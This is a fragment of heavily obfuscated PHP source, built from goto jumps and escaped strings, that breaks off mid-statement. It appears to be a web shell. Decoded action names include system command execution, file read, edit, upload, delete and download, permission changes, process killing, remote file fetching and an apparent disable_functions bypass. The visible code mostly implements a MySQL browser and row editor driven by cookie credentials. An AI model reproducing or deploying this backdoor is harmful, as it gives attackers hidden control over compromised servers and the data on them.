goto c986dd7b7d979571; E59465cbcee8df60: echo "\74\57\x64\x69\x76\76"; goto dc82fb9ce1e1fc1a; E523b91e87d9576d: if (isset($_POST["\x65\x6d\x72"]) && is_string($_POST["\145\155\162"]) && !empty($_POST["\x65\x6d\x72"])) { goto Fd72a5942e02a796; } goto c67473208765d39b; B3079afca805a365: if (!($A99499e948bd463c > 1)) { goto D99bc21087e52cbb; } goto a984f4f9d7320acc; e102fbbf73c3946b: foreach ($Fb08e115b362cc65 as $A92dc7ed95979ac7) { echo "\74\164\150\40\x64\141\164\141\x2d\143\157\154\x75\155\x6e\x2d\x6e\x61\x6d\145\x3d\x22" . htmlspecialchars($A92dc7ed95979ac7) . "\42\76" . htmlspecialchars($A92dc7ed95979ac7) . "\x3c\57\164\150\x3e"; cd065ea66f983895: } goto Cc283237a58fa835; Aa476d1358f64402: echo "\74\x2f\x64\x69\166\x3e"; goto B5c952d1ec156fed; b09532cf6d690c8f: D59415d47fe629ea: goto f4a5e5702462e3ca; B27eade099f2294d: echo "\74\x2f\x74\x72\x3e\x3c\57\x74\x68\145\x61\144\76\74\x74\x62\157\x64\x79\76"; goto baab9b4ce96643db; b6305ddb8a213b6e: foreach ($cf1490e54a29ea1a as $cef228408c24c48a) { goto A2f3df6949473b6f; D0f1b39e56a9b1d7: C36b35c0c0b82c16: goto Ce552fed76c33c5d; A2f3df6949473b6f: $A815e8104dbdb799 = $cef228408c24c48a["\164\141\x62\x6c\x65\137\156\x61\155\145"]; goto Ce17f90d829fa44b; Ce17f90d829fa44b: $Bbcef1e79c4dba7d = $Efce2ba71df08569 == $A815e8104dbdb799 ? "\x63\154\141\x73\x73\x3d\x22\141\x63\x74\x69\166\145\42" : ''; goto E5f5b18f61d02480; E5f5b18f61d02480: echo "\x3c\154\151\40{$Bbcef1e79c4dba7d}\76\x3c\x61\40\150\x72\x65\x66\x3d\42\x6a\141\x76\141\163\x63\x72\x69\160\164\72\x6e\x61\166\151\147\141\164\x65\x28\x27\141\167\141\x6c\x27\x2c\x20\47\x73\153\154\x27\x2c\x20\x27\144\141\x74\141\x62\141\163\145\x27\54\40\x27{$Cb7c56c153b6fafa}\x27\x2c\40\47\164\x27\54\x20\47" . B526E9837163414E($A815e8104dbdb799) . "\x27\51\x22\x3e" . htmlspecialchars($A815e8104dbdb799) . "\x3c\x2f\141\x3e\x3c\x2f\x6c\151\76"; goto D0f1b39e56a9b1d7; Ce552fed76c33c5d: } goto ac692ce52517d91e; ed19582e120175ca: echo "\74\x2f\x64\151\166\x3e"; goto b34f4fcec439bb36; dc82fb9ce1e1fc1a: echo "\x3c\x64\x69\166\x20\143\x6c\141\163\x73\75\x22\x64\142\55\x63\x6f\156\164\145\156\164\x22\76"; goto Db1059f2cb5786cf; c4a27a2bbc855abf: echo "\74\x64\151\x76\40\143\x6c\x61\x73\163\x3d\42\144\142\x2d\x74\141\x62\154\x65\x2d\151\x6e\146\157\x22\x3e\x3c\x73\x70\x61\156\40\143\x6c\x61\163\x73\x3d\x22\x71\x61\154\x69\x6e\x22\x3e\123\x51\x4c\40\121\x75\145\x72\x79\40\x52\x65\163\x75\x6c\x74\72\74\57\163\160\x61\156\x3e\74\x70\162\145\76" . htmlspecialchars($a135c38d02b9cf23) . "\74\x2f\x70\x72\x65\x3e\74\x2f\x64\151\x76\76"; goto F013a8bb1a30c224; Fe30ee2b943d592f: foreach ($Bae9033c3cf95c45 as $Fb990e0c2cbb02f7) { goto C7b2c7295aca64a8; ea72486ba9e3f416: echo "\x3c\57\x74\x72\76"; goto d738b90ffbc2353d; C7b2c7295aca64a8: $da22136251cc2260 = htmlspecialchars(reset($Fb990e0c2cbb02f7)); goto e103bf350e8570ce; e103bf350e8570ce: $C5e1f7ad43919951 = b526E9837163414E($da22136251cc2260); goto Cda70655f4e3eb5f; d738b90ffbc2353d: Bbf497a1498b016b: goto bdef7cfe96de2706; Dd971df442384bf1: echo "\x3c\x74\x64\x3e\74\x61\40\143\154\x61\x73\x73\75\x22\142\x74\x6e\55\155\x6f\144\145\x72\156\x22\40\163\x74\x79\154\145\75\42\160\x61\144\x64\151\x6e\147\x3a\40\x34\160\x78\x20\x38\x70\170\x3b\40\x74\x65\170\x74\55\144\x65\x63\157\162\141\164\x69\x6f\x6e\72\x20\156\x6f\x6e\145\73\x22\x20\150\x72\145\146\x3d\42\x6a\x61\166\141\x73\x63\x72\151\x70\x74\x3a\156\141\166\151\x67\141\164\x65\50\x27\141\x77\141\154\x27\54\x20\47\x65\x64\151\x74\x5f\144\142\137\x66\x6f\162\155\x27\x2c\x20\47\164\x27\54\x20\47" . $_POST["\164"] . "\47\54\x20\47\160\153\137\x76\x61\154\47\54\40\x27" . $C5e1f7ad43919951 . "\47\51\x22\x3e\x45\144\x69\164\x3c\x2f\141\x3e\x3c\57\164\144\76"; goto ea72486ba9e3f416; Af1031157dbd63f2: c2354c77e2939b0d: goto Dd971df442384bf1; Cda70655f4e3eb5f: echo "\x3c\x74\162\40\144\141\x74\x61\55\x70\153\55\x76\x61\x6c\75\42" . $da22136251cc2260 . "\x22\x3e"; goto D2dd17a5c3fca9e0; D2dd17a5c3fca9e0: foreach ($Fb990e0c2cbb02f7 as $af3f628034377275) { echo "\x3c\x74\x64\x3e\74\144\151\166\x3e" . htmlspecialchars($af3f628034377275) . "\x3c\57\144\x69\x76\76\x3c\57\x74\x64\x3e"; C3a5c7c4cfd56b18: } goto Af1031157dbd63f2; bdef7cfe96de2706: } goto e5f97a49812a6cdf; c15b9f487214a9b9: echo "\74\141\x20\143\x6c\141\x73\163\x3d\x22" . $Bbcef1e79c4dba7d . "\42\40\150\162\145\146\x3d\42\x6a\x61\166\x61\x73\143\x72\151\x70\164\72\156\141\x76\x69\147\x61\164\x65\50\47\x61\167\141\154\x27\54\40\x27\163\x6b\154\x27\x2c\40\47\x64\141\164\141\142\141\163\x65\47\x2c\40\x27" . $Cb7c56c153b6fafa . "\x27\54\x20\47\164\x27\54\x20\x27" . b526E9837163414e($A815e8104dbdb799) . "\47\x2c\40\47\x68\x61\154\141\155\x61\156\x27\x2c\40\x27" . $c086d6a462e02397 . "\x27\x29\x3b\42\x3e" . $c086d6a462e02397 . "\x3c\57\x61\x3e\40"; goto D100ef14f4c54ed0; C5d19d419fcdaed0: $a5064888437638ee = empty($Cb7c56c153b6fafa) ? '' : "\144\x62\156\141\155\145\75" . $Cb7c56c153b6fafa . "\73"; goto a539fd739fab202f; b97f3af8291b2d6f: $eded473045ce3719 = $dd10a73ee2d1f279->query("\x53\105\x4c\x45\x43\x54\40\x73\143\x68\x65\x6d\141\137\156\x61\155\x65\40\x46\122\117\115\40\151\x6e\146\157\x72\155\141\x74\x69\x6f\156\137\x73\143\150\145\155\x61\56\x73\x63\150\145\x6d\x61\x74\141")->fetchAll(); goto D2af9ce7da814fe1; d2afbd15e4033e73: $c086d6a462e02397 = 1; goto Ac1b1c322cb7d0e8; be38a602e72e5859: echo "\x3c\164\150\76\101\143\x74\x69\x6f\x6e\163\74\x2f\164\150\76"; goto b734157b3c10bb2e; F61455bf51e9a330: $D37ef5b6311dceff->execute(array($Cb7c56c153b6fafa)); goto c760138dcd2f14c5; D44a4b58c87e9fc6: echo "\x3c\144\151\x76\40\143\x6c\x61\163\x73\75\42\144\141\164\141\x2d\x74\x61\142\x6c\145\x2d\x63\157\156\164\x61\151\156\x65\162\x22\76"; goto a844eef8a8fa6095; f396e5e279733df0: echo "\74\x73\x70\141\156\40\163\164\x79\154\x65\x3d\x27\x63\157\154\x6f\162\x3a\x20\43\x66\x66\65\65\65\65\x3b\x27\x3e\x45\x72\162\157\162\40\145\170\145\x63\165\x74\x69\156\x67\x20\x71\x75\145\x72\x79\x3a\40" . htmlspecialchars($dd10a73ee2d1f279->errorInfo()[2]) . "\74\57\163\160\x61\156\76"; goto acb5ca9a15b36720; c49558e9a241b13d: foreach ($eded473045ce3719 as $Ef2e9232fc636aa9) { goto af9001727a496629; b5bc2416b9786f6b: $Bbcef1e79c4dba7d = $Cb7c56c153b6fafa == $a49fee7e15659711 ? "\x63\154\141\x73\163\x3d\x22\141\x63\x74\x69\x76\145\x22" : ''; goto dce84f86bbe9f225; Fa693e8b4b7a8782: A42f0040732ede70: goto D88ba02911c5f565; af9001727a496629: $a49fee7e15659711 = $Ef2e9232fc636aa9["\163\143\x68\145\x6d\141\137\x6e\141\155\145"]; goto b5bc2416b9786f6b; dce84f86bbe9f225: echo "\74\154\151\x20{$Bbcef1e79c4dba7d}\76\x3c\141\x20\150\x72\x65\146\x3d\x22\x6a\x61\x76\x61\163\x63\x72\x69\x70\164\x3a\x6e\141\x76\151\147\141\164\x65\50\47\x61\x77\x61\x6c\x27\x2c\40\x27\x73\x6b\154\47\x2c\40\x27\144\x61\164\141\x62\x61\163\x65\x27\x2c\x20\47{$a49fee7e15659711}\x27\51\x22\76{$a49fee7e15659711}\x3c\x2f\141\76\74\x2f\154\151\x3e"; goto Fa693e8b4b7a8782; D88ba02911c5f565: } goto Ffb6b178c3d648c9; B5c952d1ec156fed: $B21e8e9a58247acc = $dd10a73ee2d1f279->prepare("\x53\105\x4c\105\x43\x54\40\143\x6f\154\x75\155\x6e\x5f\x6e\x61\x6d\145\x20\x66\x72\157\155\40\x69\x6e\x66\x6f\162\x6d\141\x74\151\157\x6e\137\x73\x63\150\145\155\x61\56\x63\x6f\x6c\x75\155\156\x73\x20\167\150\x65\162\145\40\164\x61\x62\x6c\145\137\163\x63\x68\x65\x6d\141\75\77\x20\x61\156\x64\40\x74\141\142\x6c\x65\137\156\141\155\145\x3d\77"); goto A58c5737ad0b84e2; D583dfa43c0abc68: echo "\x3c\142\x72\76\x3c\x73\x70\141\x6e\40\x63\154\x61\163\163\75\42\x71\x61\x6c\151\156\42\76\x52\x6f\167\x73\72\x3c\x2f\163\160\x61\156\x3e\40" . $f0339209096c1407; goto Aa476d1358f64402; c7f4d7da121c4392: if ($Fb08e115b362cc65) { goto F3b73767596ffa22; } goto D31b23c22208974f; c760138dcd2f14c5: $cf1490e54a29ea1a = $D37ef5b6311dceff->fetchAll(); goto e4d36e2547ebd10c; B721362a017199d9: f880ec7847e96575: goto be3b2c481ea0dc64; f3968ae53432f62f: goto E3123498f1b1b72f; goto F4129cc32729d81c; D0f473f58ad6166f: echo "\x3c\x2f\x74\x62\x6f\144\171\76\x3c\57\x74\x61\142\154\x65\76\x3c\x2f\x64\151\x76\x3e"; goto af367ab405869282; a8b96d9126470485: echo "\x3c\57\144\151\x76\x3e"; goto f8c40e073af7514d; A44bd9ed0f3a383a: D99bc21087e52cbb: goto B4f5f7fdc8689022; afefaee55ee155d8: $Bbcef1e79c4dba7d = $c240f705a5351ab8 == $c086d6a462e02397 ? "\x61\x63\164\151\x76\145" : ''; goto c15b9f487214a9b9; Cc283237a58fa835: C528b4b52bf4f18a: goto be38a602e72e5859; Ae92a36aed053e61: echo "\74\57\x64\x69\166\x3e"; goto ed19582e120175ca; e72e49b610302a12: E303a37bc9516565: goto Ae92a36aed053e61; fe04d8270d188341: echo "\x3c\144\x69\x76\x20\143\x6c\x61\163\x73\75\42\x64\x61\164\141\x2d\x74\141\x62\154\x65\55\x63\x6f\156\164\x61\x69\x6e\x65\x72\x22\x3e"; goto c05a6ee62b370edf; f40e65a132307d2d: goto fc330fb5ebdc8dda; goto d9d3ad7f402ca2f9; d9d3ad7f402ca2f9: c7fee83713868baf: goto D44a4b58c87e9fc6; ecffa3b0d3d8277a: $Bae9033c3cf95c45 = $fc8855223935f94b->fetchAll(); goto ac8750d03776c2db; Ce0bf237875b5f1a: echo "\x3c\x64\151\166\40\143\154\x61\163\x73\75\x22\x73\x71\x6c\x2d\x65\x64\x69\x74\x6f\x72\55\x63\157\156\x74\x61\151\x6e\x65\162\x22\x3e"; goto B0f0a6fbeef28c85; A9fc6832a1c1cf43: if ($fc8855223935f94b) { goto e58e259b6acdcc4d; } goto f396e5e279733df0; A58c5737ad0b84e2: $B21e8e9a58247acc->execute(array($Cb7c56c153b6fafa, $A815e8104dbdb799)); goto f27fc7bf1a3ce7ac; E4bf2553e3e6b348: $F04ef0bae935dbe7 = 100 * ($c240f705a5351ab8 - 1); goto f431084685a2b930; e79baad1fcde0d2c: echo "\74\x62\165\164\164\x6f\156\x20\x74\x79\160\145\75\42\x62\165\x74\164\157\x6e\42\40\x63\154\141\x73\x73\75\42\142\x74\156\55\155\x6f\144\x65\x72\x6e\x22\40\163\x74\x79\154\145\x3d\42\x6d\141\x72\x67\151\156\x2d\x74\157\160\x3a\x30\56\67\x72\145\155\73\42\x20\x6f\x6e\143\154\151\143\153\75\x22\x73\153\x6c\137\x62\141\x73\50\x29\x3b\42\x3e\x45\x78\x65\143\165\164\x65\40\x51\165\x65\162\171\x3c\x2f\x62\165\x74\x74\157\x6e\x3e"; goto a8b96d9126470485; A9b4b2a021e942e7: $Ac8bb594661cb922 = $dd10a73ee2d1f279->query("\x53\x45\114\x45\x43\124\x20\x63\x6f\x75\156\x74\50\60\51\40\101\123\x20\x73\163\40\x66\x72\157\x6d\40\x60" . $A815e8104dbdb799 . "\140"); goto Fdc4c7afccdb8f06; b34f4fcec439bb36: } catch (Exception $E4d444a4fd968be8) { echo "\x3c\x64\151\x76\40\x73\164\171\x6c\145\x3d\42\x63\x6f\154\x6f\162\72\40\x23\146\x66\65\x35\65\65\x3b\x20\x70\141\x64\x64\x69\156\x67\72\x20\x30\x2e\x37\x72\x65\x6d\73\x20\142\x6f\162\144\145\162\x3a\x20\x31\160\170\40\x64\x6f\164\164\x65\144\x20\x23\146\146\65\x35\65\65\x3b\40\x62\x6f\162\144\x65\162\x2d\x72\141\144\151\x75\x73\x3a\x20\65\x70\x78\x3b\42\x3e\x43\x6f\156\156\145\x63\164\x69\157\x6e\x20\x66\141\x69\x6c\x65\144\x3a\x20" . $E4d444a4fd968be8->getMessage() . "\x3c\57\144\151\166\76"; } goto bff0715e69083258; Aa4b249800a826b0: E86811f6bc0f46a1: goto Bea23b8993020018; C22de5b0115cb438: if (empty($A7c4a80f18b5dd9e)) { goto bcb5ce5ebb9c34e8; } goto B7f1f73c82bd29e3; b8fe8e9805c11cb4: Fb72b72771ee6759: goto d5e932b4bd995ce0; C35e8fd72a681f5e: if (empty($a8077a89a475b697["\x65\x72\x72\x6f\x72"])) { goto f9edaf44cf2f6420; } goto fc45401b291c17e3; afb2f81335d499e3: bbbfe5013875b3d1: goto fb39edfa9954ef40; De1345512719c872: $d0809c067fab8cd8 = "\142\x61\153\x5f" . microtime(1) . "\x5f" . rand(1000, 99999) . "\56\172\x69\160"; goto Cb6327f4205892ae; A80a1c68189eeaa8: $C1c94278ef7ad2e1 = array("\144\141\163\141\x72", "\x62\141\x63\141\x5f\x66\151\x6c\145", "\x70\150\x70\151\156\x66\x6f", "\x73\151\163\x74\x65\155\137\x6b\x6f\155", "\x65\x64\151\164\137\x66\151\154\x65", "\x64\x6f\x77\x6e\154\157\141\x64\x5f\146\x69\x6c\145", "\150\141\160\165\x73\137\146\x69\x6c\145", "\142\165\141\164\137\x66\x69\154\145", "\x62\x75\141\164\x5f\x66\x6f\x6c\x64\145\x72", "\150\141\160\x75\x73\137\146\x6f\154\144\145\x72", "\162\145\156\141\x6d\x65\137\146\x69\x6c\x65", "\153\157\155\x70\x72\145\x73", "\x73\x6b\154", "\x73\x6b\154\137\144\x5f\164", "\x73\x6b\154\137\144", "\x75\160\154\x5f\x66\x69\x6c\145", "\145\144\x69\x74\x5f\144\142\137\x72\x6f\167", "\x65\144\x69\x74\137\144\x62\x5f\x66\157\162\155", "\144\142\137\154\x6f\x67\x6f\x75\x74", "\x6b\151\x6c\x6c\137\x70\x72\x6f\143", "\165\x62\141\x68\137\x70\145\x72\x6d", "\146\145\x74\143\150\137\146\x69\154\x65", "\143\x68\141\x6e\x6b\x72\x6f\x5f\153\x6f\x6d"); goto Ff088d0c87dad9e0; ba4b6e0f93a2102e: $Cb7c56c153b6fafa = ''; goto Ca5fb724043b080f; a09f977b9f2eb193: E5b546c663b7da65: goto eb39d95c925cd65a; C1907b080d6a33ee: $c17121c8c5afcfe3 = file_get_contents($ddd38cf20fd62980); goto Da171e4ffd6c9a2f; B985781df1e3782e: if (file_put_contents($Babedf152eb7b8d1, $Ef860b4b8e1f6eb8) !== false) { goto Ce4402264d4e2918; } goto fcebd8f0f5dfe030; d0dc0a630db036e0: exit; goto dd1d4f694c74e620; E64cb56d736296c4: bf99d1ad88344237: goto f11cc99917239789; ee28bd174e4b5bd4: try { goto cb61b3229b9a3f0c; E385d2fd2e094ea3: echo "\74\57\x75\x6c\76"; goto A77c4a57f29daf28; E3125d5bc935cf3d: echo "\74\x64\x69\x76\40\143\x6c\141\x73\163\75\42\x64\142\55\143\x6f\156\x74\x65\156\164\x22\76"; goto Ef392824693be35a; Caeb82a404fed988: echo "\74\x2f\x64\151\166\76"; goto C024c9e66c0f461b; Fe983e1320d44a49: de49f4c5d189272c: goto f8516090cf290a4a; Be8802c87fc592a1: echo "\x3c\x64\151\166\x20\143\154\141\x73\x73\75\x22\144\x62\55\x73\x69\x64\145\x62\x61\162\x22\x3e"; goto fec63dc6de0f33ef; d028e6d8ebdd9553: echo "\x3c\141\x20\x63\154\x61\x73\x73\x3d\42\x62\164\156\55\155\x6f\144\145\x72\x6e\x22\x20\x73\x74\x79\154\x65\x3d\42\x74\145\x78\x74\x2d\144\x65\x63\157\x72\x61\164\151\157\156\x3a\156\x6f\x6e\145\73\40\142\x61\x63\x6b\147\x72\157\x75\156\x64\x2d\x63\157\154\157\162\72\x23\66\x63\67\65\67\x64\73\42\x20\150\162\x65\x66\x3d\42\x6a\x61\x76\x61\163\143\162\151\160\164\x3a\156\141\x76\151\147\141\x74\145\x28\x27\141\x77\141\x6c\47\54\x20\x27\x73\x6b\154\x27\54\x20\47\144\x61\x74\x61\142\141\x73\145\x27\54\40\47" . $Cb7c56c153b6fafa . "\47\54\40\x27\164\47\x2c\40\47" . $B6aa149d1e08960e . "\47\x2c\40\x27\150\x61\x6c\x61\x6d\x61\156\x27\x2c\40\x27" . $D3237765cba4fa1d . "\47\x29\42\76\103\x61\156\x63\145\154\x3c\x2f\141\76"; goto Caeb82a404fed988; c9b90648d2af8fc4: $dd10a73ee2d1f279 = new PDO("\155\x79\x73\161\x6c\72\150\x6f\x73\164\75" . $e7fc7ef47502e99b . "\73\144\142\x6e\141\x6d\x65\x3d" . $Cb7c56c153b6fafa . "\73\143\x68\141\162\163\x65\164\75\x75\x74\x66\70", $cf583f5d73ccf3cf, $c887d06bec538904); goto b34260a276f61060; f4467f02734d45aa: if (!(empty($e7fc7ef47502e99b) || empty($Cb7c56c153b6fafa))) { goto Df3ec77bac829fd7; } goto b295038dd67927ba; Bed24eb607fc8328: echo "\x3c\142\x75\164\164\x6f\156\40\164\171\160\x65\x3d\42\x73\165\142\155\x69\164\x22\x20\143\x6c\141\163\163\75\42\x62\164\156\55\155\157\144\145\162\156\x22\x3e\x53\x61\166\145\40\103\150\141\x6e\x67\x65\x73\x3c\x2f\142\165\x74\164\157\x6e\x3e"; goto d028e6d8ebdd9553; E6d1defd2a8faa76: $eded473045ce3719 = $dd10a73ee2d1f279->query("\x53\x45\x4c\x45\103\x54\40\163\143\150\x65\x6d\x61\137\x6e\141\155\x65\40\x46\122\117\x4d\40\151\x6e\146\x6f\162\155\141\164\151\157\156\x5f\163\x63\150\x65\x6d\141\56\163\x63\150\x65\155\x61\x74\141")->fetchAll(); goto Dbccd13d61a903dd; ee4607ed4a9f3c7b: $B6aa149d1e08960e = $_POST["\164"]; goto d06c81215d235d86; F2dc85a554af6187: ob_start(); goto e79450f3a8b9812f; Cfd3b92427747dd3: echo "\x3c\x2f\x75\x6c\x3e\74\57\x64\x69\x76\76"; goto f1a6b83bf5f33c09; bd46539d4c23fc8f: echo "\74\151\x6e\x70\x75\164\40\164\x79\160\x65\x3d\x22\150\x69\144\144\x65\x6e\x22\40\x6e\141\x6d\145\75\42\141\x77\141\x6c\x22\x20\166\x61\x6c\165\145\75\42\x65\144\151\x74\137\x64\x62\x5f\x72\157\167\42\76"; goto aab403f8eb10f9c2; c1f36c9db9b015d4: foreach ($Dd62e21578dcaf54 as $F5b2cc0d510629d7) { goto f397af5f53d51efe; f524f3abca4a8650: echo "\x3c\144\x69\166\40\x63\x6c\141\x73\163\75\42\x66\x6f\162\x6d\55\147\162\x6f\x75\x70\42\76"; goto D3026ae5df9973c0; D3026ae5df9973c0: echo "\x3c\154\141\x62\145\154\x20\146\157\162\75\42\x65\x64\151\x74\x2d" . $Aedf769aa3c60b3d . "\42\76" . $Aedf769aa3c60b3d . "\74\x2f\154\141\142\x65\154\x3e"; goto Cb3adac85c5788cb; a0320373e0f802a0: B725270f4a39ad26: goto f30aa70f291256ae; Db354e094de764d1: bce7558f2ea9000d: goto C62e479a6e554a59; Cb3adac85c5788cb: $A283d365945fcf6b = $Aedf769aa3c60b3d == $Fbc4fe4be53f25db; goto B5aebd5ca3ba1082; C62e479a6e554a59: echo "\74\164\145\x78\x74\x61\162\x65\141\x20\x6e\x61\x6d\145\x3d\42" . $Aedf769aa3c60b3d . "\42\40\x69\144\x3d\42\145\144\x69\164\55" . $Aedf769aa3c60b3d . "\x22" . $eb7e766b4a7db9d7 . "\x3e" . $a78beaf0b1f9d894 . "\74\x2f\x74\x65\170\164\141\x72\145\x61\x3e"; goto f605ff26bfb41ab3; B151449e8340371b: echo "\x3c\57\144\151\166\x3e"; goto a0320373e0f802a0; f605ff26bfb41ab3: A72a5157db66ebf6: goto B151449e8340371b; d6d1b4824bea5f5f: $a78beaf0b1f9d894 = htmlspecialchars(isset($E3caa90f6c99b9ae[$Aedf769aa3c60b3d]) ? $E3caa90f6c99b9ae[$Aedf769aa3c60b3d] : ''); goto f524f3abca4a8650; Bdf2c7e5376a75b0: goto A72a5157db66ebf6; goto Db354e094de764d1; dbac233a935c23cb: echo "\x3c\x69\x6e\160\x75\x74\40\x74\x79\x70\145\x3d\x22\164\145\170\164\42\x20\156\141\x6d\145\75\42" . $Aedf769aa3c60b3d . "\x22\40\151\144\x3d\42\x65\x64\x69\x74\55" . $Aedf769aa3c60b3d . "\x22\40\166\x61\154\x75\145\x3d\x22" . $a78beaf0b1f9d894 . "\x22" . $eb7e766b4a7db9d7 . "\76"; goto Bdf2c7e5376a75b0; f397af5f53d51efe: $Aedf769aa3c60b3d = $F5b2cc0d510629d7["\106\x69\145\x6c\x64"]; goto d452120ae02e0dfb; d452120ae02e0dfb: $f4d4f4a5cf0c6a13 = strtolower($F5b2cc0d510629d7["\x54\171\160\x65"]); goto d6d1b4824bea5f5f; B5aebd5ca3ba1082: $eb7e766b4a7db9d7 = $A283d365945fcf6b ? "\40\162\x65\x61\x64\x6f\x6e\x6c\x79\x20\163\164\x79\154\x65\75\42\x62\141\x63\153\147\x72\157\165\x6e\x64\55\143\157\154\157\162\72\40\x23\64\64\x34\x3b\x22" : ''; goto E73970075f1b3e3d; E73970075f1b3e3d: if (strpos($f4d4f4a5cf0c6a13, "\164\x65\x78\x74") !== false || strpos($f4d4f4a5cf0c6a13, "\166\x61\x72\143\x68\x61\x72") !== false && intval(preg_replace("\x2f\133\x5e\60\55\71\x5d\x2f", '', $f4d4f4a5cf0c6a13)) > 255) { goto bce7558f2ea9000d; } goto dbac233a935c23cb; f30aa70f291256ae: } goto Fe983e1320d44a49; E148fce0740c768e: F0848356c7e5426b: goto E385d2fd2e094ea3; b7699c4f07d92a7e: $cf583f5d73ccf3cf = isset($_COOKIE["\x75\163\x65\x72"]) ? $_COOKIE["\x75\163\x65\162"] : ''; goto f26e2983c9c988f4; Ef392824693be35a: echo "\74\150\63\x3e\105\x64\151\x74\x69\156\x67\x20\162\x6f\167\40\151\x6e\40\74\x73\x70\x61\x6e\40\x73\x74\x79\154\145\x3d\x22\143\x6f\x6c\157\x72\x3a\43\60\60\106\x46\x30\x30\x3b\x22\76" . htmlspecialchars($A815e8104dbdb799) . "\x3c\x2f\x73\x70\141\x6e\76\x3c\x2f\x68\x33\76"; goto f30c4a65ae62b1f8; Af69a9853fbf0865: aed94aaef82b8428: goto E3125d5bc935cf3d; be49393c01f5b7ec: $e5063bf904c37092 = $dd10a73ee2d1f279->prepare("\x53\x45\114\x45\103\124\x20\52\x20\x46\x52\x4f\x4d\x20\x60{$A815e8104dbdb799}\140\40\127\x48\x45\122\x45\40\140{$Fbc4fe4be53f25db}\140\40\75\40\x3f"); goto D9e77f94489402d0; a014477ba31bfc08: echo "\74\151\156\160\165\164\40\x74\x79\x70\x65\75\x22\x68\x69\x64\144\x65\156\42\40\x6e\x61\x6d\145\75\x22\160\153\137\x76\x61\x6c\42\40\166\141\154\x75\x65\x3d\x22" . htmlspecialchars($_POST["\160\153\137\166\x61\154"]) . "\x22\x3e"; goto c1f36c9db9b015d4; e79450f3a8b9812f: $cf1663c4e14380df = $dd10a73ee2d1f279->query("\x44\x45\123\x43\122\111\x42\105\40\x60{$A815e8104dbdb799}\x60"); goto F0b69f714acf62de; a6eef9f1b6bbe975: a5a91cf83c6ee42b: goto Cfd3b92427747dd3; b36110354ea8a59e: Bacfec4ae01dd5a4: goto Eaaab62889b2f33a; C0d743044a5d562b: $cf1490e54a29ea1a = $D37ef5b6311dceff->fetchAll(); goto D7cf506e58d62bbc; E02264b601070a59: $D37ef5b6311dceff->execute(array($Cb7c56c153b6fafa)); goto C0d743044a5d562b; F0bb67d80b9b769f: echo "\74\57\144\x69\x76\76"; goto f3819cc907619696; C024c9e66c0f461b: echo "\x3c\57\x66\157\x72\x6d\76"; goto F0bb67d80b9b769f; f1a6b83bf5f33c09: $ec0f2866b8dced22 = ob_get_clean(); goto F2dc85a554af6187; F0b69f714acf62de: $Dd62e21578dcaf54 = $cf1663c4e14380df->fetchAll(PDO::FETCH_ASSOC); goto a06554a88550cda9; fec63dc6de0f33ef: echo "\74\150\x34\76\104\141\164\x61\142\x61\x73\145\163\x3c\x2f\150\64\x3e"; goto D310eb7490a181fc; f8516090cf290a4a: $D3237765cba4fa1d = isset($_POST["\x68\141\x6c\x61\155\141\156"]) ? $_POST["\150\x61\154\141\x6d\x61\x6e"] : "\61"; goto ee4607ed4a9f3c7b; D7cf506e58d62bbc: echo "\74\150\x34\40\x73\x74\171\x6c\x65\x3d\x22\x6d\141\162\x67\151\156\55\164\x6f\x70\72\40\x32\60\160\x78\73\x22\x3e\124\x61\142\x6c\x65\x73\x3c\57\x68\64\76"; goto f02ce88398a5a212; Fbcea42acd3aba74: $Cb7c56c153b6fafa = isset($_COOKIE["\x64\141\164\x61\142\x61\163\145"]) ? $_COOKIE["\x64\141\164\x61\142\141\163\145"] : ''; goto f4467f02734d45aa; aab403f8eb10f9c2: echo "\x3c\x69\x6e\160\x75\x74\x20\164\x79\160\x65\75\42\150\151\x64\x64\x65\156\x22\40\x6e\x61\155\x65\75\42\164\x22\40\x76\141\154\x75\145\x3d\x22" . htmlspecialchars($_POST["\164"]) . "\x22\x3e"; goto a014477ba31bfc08; b295038dd67927ba: throw new Exception("\104\141\164\141\142\x61\163\x65\40\x63\x6f\156\x6e\145\x63\x74\x69\157\x6e\40\x6e\157\164\40\x65\x73\x74\141\x62\154\151\163\x68\x65\x64\x2e"); goto bffb0c8f407050a0; Eaaab62889b2f33a: $A815e8104dbdb799 = f64198cB3e765A83($_POST["\x74"]); goto bda6c2c503d23212; E54c8dbde7ff988c: foreach ($eded473045ce3719 as $Ef2e9232fc636aa9) { goto Ac9e32c4b9eef0a4; Ac9e32c4b9eef0a4: $a49fee7e15659711 = $Ef2e9232fc636aa9["\163\x63\150\x65\x6d\x61\137\156\141\155\x65"]; goto E002a1bcc8ee2626; c5e9466a4b876b2a: echo "\x3c\x6c\x69\x20{$Bbcef1e79c4dba7d}\76\74\141\x20\x68\162\145\x66\75\x22\152\x61\166\x61\x73\143\x72\x69\160\x74\72\156\141\x76\151\x67\141\x74\x65\50\47\x61\167\x61\154\47\54\x20\x27\x73\x6b\x6c\x27\54\x20\47\144\141\164\x61\142\141\163\x65\x27\54\40\x27{$a49fee7e15659711}\47\x29\x22\76{$a49fee7e15659711}\x3c\x2f\x61\76\74\x2f\154\x69\76"; goto C4b23b710660c3b5; E002a1bcc8ee2626: $Bbcef1e79c4dba7d = $Cb7c56c153b6fafa == $a49fee7e15659711 ? "\x63\154\141\x73\163\x3d\x22\x61\x63\164\x69\166\x65\x22" : ''; goto c5e9466a4b876b2a; C4b23b710660c3b5: e7426a54ef198d6f: goto Ca936067d0f12d77; Ca936067d0f12d77: } goto E148fce0740c768e; D310eb7490a181fc: echo "\x3c\165\x6c\x20\143\154\141\x73\x73\x3d\42\x64\x62\55\154\x69\163\x74\42\76"; goto E54c8dbde7ff988c; b34260a276f61060: $dd10a73ee2d1f279->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); goto E6d1defd2a8faa76; f30c4a65ae62b1f8: echo "\x3c\x66\157\x72\155\x20\155\x65\164\x68\x6f\x64\75\x22\x50\117\x53\124\42\40\x63\x6c\141\163\163\75\x22\x64\x62\55\145\144\151\x74\55\x66\157\162\x6d\42\x3e"; goto bd46539d4c23fc8f; Df67c9afb63cac0a: throw new Exception("\x4d\151\x73\163\151\x6e\147\40\164\141\142\154\x65\40\157\162\x20\x70\x72\x69\x6d\141\162\x79\40\x6b\145\x79\56"); goto b36110354ea8a59e; Dbccd13d61a903dd: echo "\74\144\151\166\40\143\154\x61\163\x73\x3d\x22\144\142\x2d\143\x6f\156\164\141\x69\156\145\162\x22\76"; goto Be8802c87fc592a1; A77c4a57f29daf28: $D37ef5b6311dceff = 